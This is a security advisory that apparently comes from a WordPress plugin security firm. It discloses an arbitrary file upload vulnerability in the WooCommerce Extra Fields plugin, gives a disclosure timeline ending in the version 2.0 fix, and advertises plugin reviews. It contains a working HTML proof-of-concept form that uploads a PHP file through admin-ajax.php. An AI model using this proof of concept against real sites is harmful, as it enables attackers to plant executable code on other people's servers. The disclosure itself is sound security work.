19 Sep

Arbitrary File Upload Vulnerability in WooCommerce Extra Fields

After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three other shared same the same vulnerable code. One of those was WooCommerce Extra Fields (which has now been renamed WooCommerce Product Addons).

The vulnerability was subsequently fixed in version 2.0.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/product_files/ as upload.php. WooCommerce needs to be enabled for this to work.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_personalizedproduct_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Timeline

  • 7/16/2016 – Developer notified.
  • 7/16/2016 – Developer responds.
  • 8/2/2016 – Version 2.0 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *